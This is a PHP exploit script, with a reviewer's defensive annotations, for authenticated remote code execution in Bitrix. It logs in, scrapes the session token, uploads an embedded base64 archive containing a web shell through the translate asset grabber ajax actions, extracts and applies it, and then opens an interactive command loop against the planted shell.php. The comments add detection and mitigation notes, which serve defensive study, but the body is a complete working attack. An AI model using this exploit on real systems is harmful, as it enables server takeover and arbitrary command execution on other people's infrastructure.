\n\n");
// NOTE(review): the line above is the tail of an argument/usage check that
// begins before this excerpt; its text is not visible here.
//
// Defender's notes: every step below leaves a trace in the target's access
// log, and the upload/extract/apply sequence is visible to the application's
// ajax endpoint. The script only works with a valid login (it posts the
// credentials first), so it is a post-authentication tool.
$url = $argv[1];    // base URL; relative paths are appended directly, so a trailing "/" is expected
$user = $argv[2];   // login for the AUTH form post
$passwd = $argv[3]; // password; both values go into the POST body verbatim (no urlencode())
$ch = curl_init();
@unlink('./cookies.txt'); // discard any cookie jar from a previous run (warning suppressed with @)
curl_setopt($ch, CURLOPT_HEADER, true);               // headers are part of curl_exec() output, so the preg_match() checks below see them too
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  // session cookies are persisted to the working directory
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);       // TLS verification is disabled: any certificate is accepted
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');
print "[+] Logging into Bitrix\n";
// Step 1: form login. Setting CURLOPT_POSTFIELDS turns this request into a
// POST; the handle keeps that state until CURLOPT_POST is cleared below.
curl_setopt($ch, CURLOPT_URL, "{$url}");
curl_setopt($ch, CURLOPT_POSTFIELDS, "AUTH_FORM=1&TYPE=AUTH&USER_LOGIN={$user}&USER_PASSWORD={$passwd}");
// Success is inferred only from "BITRIX_SM_LOGIN" appearing somewhere in the response (headers included).
if (!preg_match("/BITRIX_SM_LOGIN/", curl_exec($ch))) die("[-] Login failed!\n");
// Step 2: a second, non-POST request to the same URL; the page is scraped for
// the per-session token that the ajax endpoints below require as "sessid".
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/"bitrix_sessid":"([^"]+)"/', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
print "[+] Uploading malicious archive\n";
// Step 3: the embedded base64 blob is written to rce.tar.gz in the current
// directory (the file is left on disk afterwards) and sent as the "tarFile"
// multipart field together with the scraped sessid.
// Detection: a multipart POST to ajax.php with action=translate.asset.grabber.upload,
// followed by the .extract and .apply actions from the same session.
@file_put_contents("rce.tar.gz", base64_decode("H4sIAAAAAAAAA+3VQWvCMBQH8F71U+Qw6DyoTaftwaKH4XCHwVDZZRsla582ENvQRPC0z75Y2Jg7THZwIvx/lxfa9/qSlkdNQUr1dKG90wmcKBrsI4+HwffY4GHo8WEQN8to6AWc3wy4x4IT7unL1lhRM+bRWu5+yzt2/0IlE/ftma5laZmfOv6IaWGMLert9ZswFA3SnLIqp+urdDGdP03nz/5suXxMb/3XTmf0o3Qybp/7RPAXvcKKLCNjTtjj2PyHYbyf/yiOY87d4DfzH2L+/0Nyv3qo8q0itqnydCM31MvG7VZyJxUZ9s5e9v8Gd6G1IDsTZa6oZkJrJTNhZVX2d93CWp13XZar6jdl43bS/3ysWx90cHlNAxfTlRJrRuValsSq8qDo3K8FAAAAAAAAAAAAAAAAAAAA4GJ8AJ02kYkAKAAA"));
curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.upload");
curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1], "tarFile" => new CURLFile("rce.tar.gz")]);
if (!preg_match('/"status":"success"/', curl_exec($ch))) die("[-] Upload failed!\n");
print "[+] Extracting malicious archive\n";
// Step 4: ask the server to unpack the uploaded archive.
curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.extract");
curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1]]);
if (!preg_match('/"status":"success"/', curl_exec($ch))) die("[-] Extract failed!\n");
// Step 5: "apply". The response is expected to echo a JSON-escaped path of the
// form upload\/tmp... ; the whole match is taken, its last 8 characters are
// dropped (presumably a trailing file-name segment — cannot tell from here)
// and the "\/" escapes are turned back into "/", yielding the directory the
// archive was extracted into.
curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.apply");
curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1], "PROCESS_TOKEN" => 1, "languageId" => "en"]);
if (!preg_match('/upload\\\\\/tmp[^"]+"/', curl_exec($ch), $path)) die("[-] Path not found!\n");
$path = str_replace('\/', '/', substr($path[0], 0, -8));
print "[+] Launching shell\n";
// Step 6: interactive loop against shell.php inside the extracted directory
// (so the archive is expected to contain such a file). Each command is sent
// base64-encoded in a request header named "C"; the output is read back from
// between "____" markers in the response body.
// Detection: requests for a shell.php under upload/tmp, a non-standard "C:"
// request header carrying base64, and responses wrapped in "____" delimiters.
// Mitigation: the upload/ tree should not be served as executable PHP, and
// the translate asset endpoints should be restricted or patched.
curl_setopt($ch, CURLOPT_URL, "{$url}{$path}/shell.php");
curl_setopt($ch, CURLOPT_POST, false);
while(1) {
    print "\nbitrix-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break; // loose == comparison; typing "exit" ends the loop
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);
    // Any response without the "____...____" frame aborts the script.
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}